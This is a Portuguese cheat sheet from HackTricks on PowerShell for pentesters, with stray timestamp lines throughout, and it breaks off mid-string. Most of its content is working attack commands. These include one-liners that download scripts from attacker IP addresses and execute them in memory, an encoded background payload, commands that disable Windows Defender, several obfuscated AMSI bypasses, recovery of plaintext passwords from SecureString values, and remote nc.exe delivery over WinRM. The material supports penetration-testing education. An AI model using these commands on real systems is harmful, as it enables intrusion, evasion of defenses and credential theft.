2024-02-02 18:38:49 +00:00
# Noções Básicas de PowerShell para Pentesters
2022-04-28 16:01:33 +00:00
2023-08-29 18:32:30 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-02-03 01:32:44 +00:00
< summary > < strong > Aprenda hacking em AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-02 21:38:50 +00:00
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** , confira os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
* Adquira o [**material oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
* **Junte-se ao grupo** 💬 [**Discord** ](https://discord.gg/hRep4RUj7f ) ou ao grupo [**telegram** ](https://t.me/peass ) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
2023-08-29 18:32:30 +00:00
< / details >
2023-06-06 18:56:34 +00:00
2023-08-29 18:32:30 +00:00
## Localizações padrão do PowerShell
```powershell
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```
2023-12-24 19:01:27 +00:00
## Comandos básicos do PS para começar
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic
Get-Help Get-Item -Examples #List examples
Import-Module < modulepath >
Get-Command -Module < modulename >
```
2023-12-24 19:01:27 +00:00
## Baixar & Executar
2022-08-18 23:30:34 +00:00
```powershell
2023-05-29 20:18:06 +00:00
g
2020-07-15 15:43:14 +00:00
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
2022-09-09 11:00:52 +00:00
#https://twitter.com/Alh4zr3d/status/1566489367232651264
2023-08-29 18:32:30 +00:00
#host a text record with your payload at one of your (unburned) domains and do this:
2022-09-09 11:00:52 +00:00
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
2020-07-15 15:43:14 +00:00
```
2024-02-02 18:38:49 +00:00
### Baixar & Executar em segundo plano com Bypass do AMSI
2022-08-18 23:30:34 +00:00
```powershell
2023-08-29 18:32:30 +00:00
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
2021-10-25 23:03:11 +00:00
```
2023-12-24 19:01:27 +00:00
### Usando b64 do linux
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc < BASE64_ENCODED_PAYLOAD >
```
2022-05-29 12:54:31 +00:00
## Download
2020-07-15 15:43:14 +00:00
2022-05-29 12:54:31 +00:00
### System.Net.WebClient
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
2020-09-05 18:39:37 +00:00
```
2023-12-24 19:01:27 +00:00
### Invoke-WebRequest
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
2020-09-05 18:39:37 +00:00
```
2022-05-29 12:54:31 +00:00
### Wget
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
2020-09-05 18:39:37 +00:00
```
2022-05-29 12:54:31 +00:00
### BitsTransfer
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
2020-09-05 18:39:37 +00:00
# OR
2020-07-15 15:43:14 +00:00
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
2022-05-29 12:54:31 +00:00
## Base64 Kali & EncodedCommand
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand < Base64 >
```
2023-06-06 18:56:34 +00:00
## [Política de Execução](../authentication-credentials-uac-and-efs.md#ps-execution-policy)
2020-07-15 15:43:14 +00:00
2023-08-29 18:32:30 +00:00
## [Linguagem Restrita](broken-reference/)
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
## [Política do AppLocker](broken-reference/)
2020-07-15 15:43:14 +00:00
2023-12-24 19:01:27 +00:00
## Habilitar WinRM (PS Remoto)
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
enable-psremoting -force #This enables winrm
2022-05-01 12:49:36 +00:00
# Change NetWorkConnection Category to Private
2020-07-15 15:43:14 +00:00
#Requires -RunasAdministrator
Get-NetConnectionProfile |
2023-08-29 18:32:30 +00:00
Where{ $_.NetWorkCategory -ne 'Private'} |
ForEach {
$_
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
}
2020-07-15 15:43:14 +00:00
```
2023-06-06 18:56:34 +00:00
## Desativar o Defender
2020-07-15 15:43:14 +00:00
2023-05-09 09:37:25 +00:00
{% code overflow="wrap" %}
2022-08-18 23:30:34 +00:00
```powershell
2022-08-12 23:51:41 +00:00
# Check status
2020-07-15 15:43:14 +00:00
Get-MpComputerStatus
2022-08-18 23:30:34 +00:00
Get-MpPreference | select Exclusion* | fl #Check exclusions
2022-08-12 23:51:41 +00:00
# Disable
2020-07-15 15:43:14 +00:00
Set-MpPreference -DisableRealtimeMonitoring $true
2022-08-12 23:51:41 +00:00
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
2023-05-09 09:37:25 +00:00
Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring
Add-MpPreference -ExclusionPath (pwd)
2022-08-18 23:30:34 +00:00
# Check exclusions configured via GPO
Parse-PolFile .\Registry.pol
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0
2020-07-15 15:43:14 +00:00
```
2023-08-29 18:32:30 +00:00
{% endcode %}
2023-12-24 19:01:27 +00:00
### Bypass do AMSI
2020-07-15 15:43:14 +00:00
2024-02-02 18:38:49 +00:00
**`amsi.dll`** é **carregada** no seu processo e possui os **exports** necessários para qualquer aplicação interagir com ela. E porque está carregada no espaço de memória de um processo que você **controla** , você pode mudar seu comportamento **sobrescrevendo instruções na memória** . Fazendo com que ela não detecte nada.
2022-05-29 12:54:31 +00:00
2023-12-24 19:01:27 +00:00
Portanto, o objetivo dos bypasses do AMSI que você verá é **sobrescrever as instruções dessa DLL na memória para tornar a detecção inútil** .
2022-05-29 12:54:31 +00:00
2024-01-02 21:38:50 +00:00
Página web do **gerador de bypass do AMSI** : [**https://amsi.fail/** ](https://amsi.fail/ )
2022-08-18 23:30:34 +00:00
```powershell
2022-05-29 12:54:31 +00:00
# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
2023-08-29 18:32:30 +00:00
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
2022-05-29 12:54:31 +00:00
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
2023-08-29 18:32:30 +00:00
& ( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )
2022-05-29 12:54:31 +00:00
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
${1}.SetValue($null,$true)
# Another Method
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)
# AMSI Bypass in python
https://fluidattacks.com/blog/amsi-bypass-python/
# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass
# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html
```
2024-02-03 01:32:44 +00:00
### AMSI Bypass 2 - Gancho de Chamada de API Gerenciada
2022-05-29 12:54:31 +00:00
2023-12-24 19:01:27 +00:00
Confira [**este post para informações detalhadas** ](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/ )[ **e o código** ](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/ ).
2022-12-31 17:21:45 +00:00
2024-02-03 01:32:44 +00:00
Esta nova técnica depende do gancho de chamadas de API de métodos .NET. Acontece que métodos .NET precisam ser compilados para instruções de máquina nativas na memória, que acabam se parecendo muito com métodos nativos. Esses métodos compilados podem ser interceptados para alterar o fluxo de controle de um programa.
2022-12-31 17:21:45 +00:00
2024-02-03 01:32:44 +00:00
Os passos para realizar o gancho de chamada de API de métodos .NET são:
2022-12-31 17:21:45 +00:00
2024-02-03 01:32:44 +00:00
1. Identificar o método alvo para o gancho
2023-12-24 19:01:27 +00:00
2. Definir um método com o mesmo protótipo de função que o alvo
2023-06-06 18:56:34 +00:00
3. Usar reflexão para encontrar os métodos
4. Garantir que cada método tenha sido compilado
5. Encontrar a localização de cada método na memória
2023-08-29 18:32:30 +00:00
6. Sobrescrever o método alvo com instruções apontando para nosso método malicioso
2022-12-31 17:21:45 +00:00
2023-12-24 19:01:27 +00:00
### AMSI Bypass 3 - Privilégio SeDebug
2024-02-02 18:38:49 +00:00
[**Seguindo este guia & código** ](https://github.com/MzHmO/DebugAmsi ) você pode ver como, com privilégios suficientes para depurar processos, é possível iniciar um processo powershell.exe, depurá-lo, monitorar quando ele carrega `amsi.dll` e desativá-lo.
2023-12-24 19:01:27 +00:00
### AMSI Bypass - Mais Recursos
2023-09-11 15:59:11 +00:00
2023-12-24 19:01:27 +00:00
+ [S3cur3Th1sSh1t/Amsi-Bypass-Powershell ](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell )
+ [Amsi Bypass no Windows 11 em 2023 ](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6 ) [Github ](https://github.com/senzee1984/Amsi_Bypass_In_2023 )
2023-09-11 15:59:11 +00:00
2023-12-24 19:01:27 +00:00
## PS-History
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
```
2024-02-02 18:38:49 +00:00
## Encontrar arquivos mais recentes
Opções: `CreationTime` , `CreationTimeUtc` , `LastAccessTime` , `LastAccessTimeUtc` , `LastWriteTime` , `LastWriteTimeUtc`
```powershell
# LastAccessTime:
(gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
# LastWriteTime:
(gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName
```
2023-06-06 18:56:34 +00:00
## Obter permissões
2023-08-29 18:32:30 +00:00
```powershell
2023-12-24 19:01:27 +00:00
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
2023-09-11 15:59:11 +00:00
```
2023-12-24 19:01:27 +00:00
## Versão do SO e HotFixes
2023-09-11 15:59:11 +00:00
```powershell
2023-12-24 19:01:27 +00:00
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
2023-08-29 18:32:30 +00:00
```
2023-12-24 19:01:27 +00:00
## Ambiente
2023-08-29 18:32:30 +00:00
```powershell
2023-12-24 19:01:27 +00:00
Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName @Get UserName value
2023-08-29 18:32:30 +00:00
```
2023-12-24 19:01:27 +00:00
## Outros drives conectados
2023-08-29 18:32:30 +00:00
```powershell
2023-12-24 19:01:27 +00:00
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
2023-08-29 18:32:30 +00:00
```
2023-12-24 19:01:27 +00:00
### Lixeira
2022-08-18 23:30:34 +00:00
```powershell
2023-12-24 19:01:27 +00:00
$shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()
2022-08-13 15:36:34 +00:00
```
2023-12-24 19:01:27 +00:00
## Reconhecimento de Domínio
2023-08-29 18:32:30 +00:00
2023-12-24 19:01:27 +00:00
{% content-ref url="powerview.md" %}
[powerview.md ](powerview.md )
{% endcontent-ref %}
2023-08-29 18:32:30 +00:00
2023-12-24 19:01:27 +00:00
## Usuários
2023-08-29 18:32:30 +00:00
```powershell
2023-12-24 19:01:27 +00:00
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
2023-08-29 18:32:30 +00:00
```
2024-02-03 01:32:44 +00:00
## De String Segura para Texto Simples
2023-12-24 19:01:27 +00:00
```powershell
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl
2023-08-29 18:32:30 +00:00
2023-12-24 19:01:27 +00:00
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
```
2024-02-03 01:32:44 +00:00
Ou fazendo o parsing diretamente de XML:
2023-08-29 18:32:30 +00:00
```powershell
2023-12-24 19:01:27 +00:00
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
2023-08-29 18:32:30 +00:00
```
2023-12-24 19:01:27 +00:00
## SUDO
```powershell
#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '< PASSWORD > ' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("< USERNAME > ", $pass)
2023-08-29 18:32:30 +00:00
2023-12-24 19:01:27 +00:00
#For local:
Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"
2023-08-29 18:32:30 +00:00
2023-12-24 19:01:27 +00:00
#For WINRM
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred
2023-09-11 15:59:11 +00:00
2023-12-24 19:01:27 +00:00
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command & {Start-Process C:\xyz\nc.bat -verb Runas}'
2023-09-11 15:59:11 +00:00
2023-12-24 19:01:27 +00:00
#Another method
$secpasswd = ConvertTo-SecureString "< password > " -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("< user > ", $secpasswd)
$computer = "< hostname > "
```
## Grupos
2023-09-11 15:59:11 +00:00
```powershell
2023-12-24 19:01:27 +00:00
Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
2023-09-11 15:59:11 +00:00
```
2023-12-24 19:01:27 +00:00
## Área de Transferência
2022-08-18 23:30:34 +00:00
```powershell
2023-12-24 19:01:27 +00:00
Get-Clipboard
2020-07-15 15:43:14 +00:00
```
2023-12-24 19:01:27 +00:00
## Processos
2023-08-29 18:32:30 +00:00
```powershell
2023-12-24 19:01:27 +00:00
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
2020-07-15 15:43:14 +00:00
```
2023-06-06 18:56:34 +00:00
## Serviços
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Get-Service
```
2023-12-24 19:01:27 +00:00
## Senha a partir de string segura
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password
```
2023-06-06 18:56:34 +00:00
## Tarefas Agendadas
2023-08-29 18:32:30 +00:00
```powershell
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
2023-12-24 19:01:27 +00:00
## Rede
2023-08-29 18:32:30 +00:00
2023-12-24 19:01:27 +00:00
### Varredura de Portas
2023-08-29 18:32:30 +00:00
```powershell
2023-12-24 19:01:27 +00:00
# Check Port or Single IP
Test-NetConnection -Port 80 10.10.10.10
2023-08-29 18:32:30 +00:00
2023-12-24 19:01:27 +00:00
# Check Port List in Single IP
80,443,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
2023-08-29 18:32:30 +00:00
2023-12-24 19:01:27 +00:00
# Check Port Range in single IP
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null
2023-08-29 18:32:30 +00:00
2023-12-24 19:01:27 +00:00
# Check Port List in IP Lists - 80,443,445,8080
"10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
2023-08-29 18:32:30 +00:00
```
2023-12-24 19:01:27 +00:00
### Interfaces
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
2022-06-15 20:54:51 +00:00
### Firewall
2022-08-18 23:30:34 +00:00
```powershell
2022-06-15 20:54:51 +00:00
Get-NetFirewallRule -Enabled True
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow
2023-05-10 11:58:37 +00:00
# Open SSH to the world
New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow
2022-06-15 20:54:51 +00:00
# Get name, proto, local and rremote ports, remote address, penable,profile and direction
## You can user the following line changing the initial filters to indicat a difefrent direction or action
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action
```
2023-06-06 18:56:34 +00:00
### Rota
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
route print
```
2022-05-29 12:54:31 +00:00
### ARP
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```
2022-05-29 12:54:31 +00:00
### Hosts
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
```
2022-05-29 12:54:31 +00:00
### Ping
2022-08-18 23:30:34 +00:00
```powershell
2021-01-24 15:20:05 +00:00
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
```
2022-05-29 12:54:31 +00:00
### SNMP
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
2023-06-06 18:56:34 +00:00
## **Convertendo a String SDDL em um Formato Legível**
2023-08-29 18:32:30 +00:00
```powershell
2024-01-02 21:38:50 +00:00
PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0